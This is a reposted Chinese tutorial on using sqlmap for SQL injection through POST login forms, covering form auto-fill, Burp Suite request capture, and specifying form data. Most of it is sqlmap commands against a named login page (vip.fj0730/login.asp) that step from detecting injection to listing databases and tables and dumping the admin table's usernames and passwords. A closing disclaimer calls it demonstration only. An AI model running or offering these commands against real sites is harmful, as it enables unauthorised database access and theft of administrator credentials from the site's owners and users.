SqlmapPOST注⼊三种⽅法(转载)不管怎么说?使⽤⼯具Sqlmap POST注⼊都会简单很多,具体说说Sqlmap POST注⼊三种⽅法吧!
⼀、⾃动填写表单
⾃动填写表单是Sqlmap⼯具POST注⼊的第⼀种⽅法,具体步骤如下:
1、判断是否有post注⼊?
root@Kali:~# sqlmap -u vip.fj0730/login.asp --forms
出来的提⽰,⼀路回车就可以了!
结果如下图:
从这⾥,可以得到数据库是:Microsoft SQL Server,也就是mssql;
总之,⼀句话总结即可!IIS+ASP+windows+mssql;
这⾥重点说⼀下,Sql Server(mssql)数据库类似于mysql,数据库结构如下:
数据库A -> 表名 -> 列名 -> 数据
数据库B -> 表名 -> 列名 -> 数据
asp 源代码因此:mssql注⼊和其实都差不多。
2、查数据库
root@Kali:~# sqlmap -u vip.fj0730/login.asp --forms --dbs
注意:如果遇到数据库⾮常多,⽽且我们也不知道管理⽤户名和密码存放在哪个数据库中?⼜应该怎么办呢?
查当前的数据库
root@Kali:~# sqlmap -u vip.fj0730/login.asp --forms --current-db
后⾯就不截图了,都很简单,这⾥到了当前数据库是“vip_0730"。
3、查表名
root@Kali:~# sqlmap -u vip.fj0730/login.asp --forms -D vip_0730 --tables
4、查列名
root@Kali:~# sqlmap -u vip.fj0730/login.asp --forms -D vip_0730 -T admin --columns
5、爆出数据
root@Kali:~# sqlmap -u vip.fj0730/login.asp --forms -D vip_0730 -T admin -C user_name,user_pwd --dump
从这⾥就可以爆出 vip_0730 数据库中 admin 表的 user_name 和 user_pwd 列的数据了。
⼆、Sqlmap结合BurpSuite
这是Sqlmap⼯具POST注⼊的第⼆种⽅法;这种⽅法要⽐⾃动填写表单准确性⾼些,但是:⾃动表单会简单快⼀点。具体步骤如下:
1、抓包
2、全选抓包的数据,右键 -> Copy 就可以保存到 1.txt ⽂档中;
3、sqlmap -r 指定⽂件
root@Kali:~# sqlmap -r '/'
4、查当前数据库
root@Kali:~# sqlmap -r '/' --current-db
后⾯的这些和前⾯的就没什么区别了,就不继续讲重复的内容了。下⾯直接来说说Sqlmap POST注⼊第三种⽅法吧!
三、指定表单注⼊
指定表单注⼊是Sqlmap POST注⼊第三种⽅法,这个其实也需要抓包的。当然,不抓也可以,查看源代码等什么的也不是不可以,只是抓包⽐较精准⽽已。只要能知道指定的表单数据就可以了!
例如:我这⾥⽤指定表单注⼊,你只要能获取到“userid=aaa&passwd=bbbb”这个就可以了,不管你是⽤哪种途径获取到的都可以。
1、检测是否有注⼊?
root@Kali:~# sqlmap -u vip.fj0730/login.asp --data "userid=aaa&passwd=bbbb"
2、查当前数据库
root@Kali:~# sqlmap -u vip.fj0730/login.asp --data "userid=aaa&passwd=bbbb" --current-db  ——————————————————————————————————————————————

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。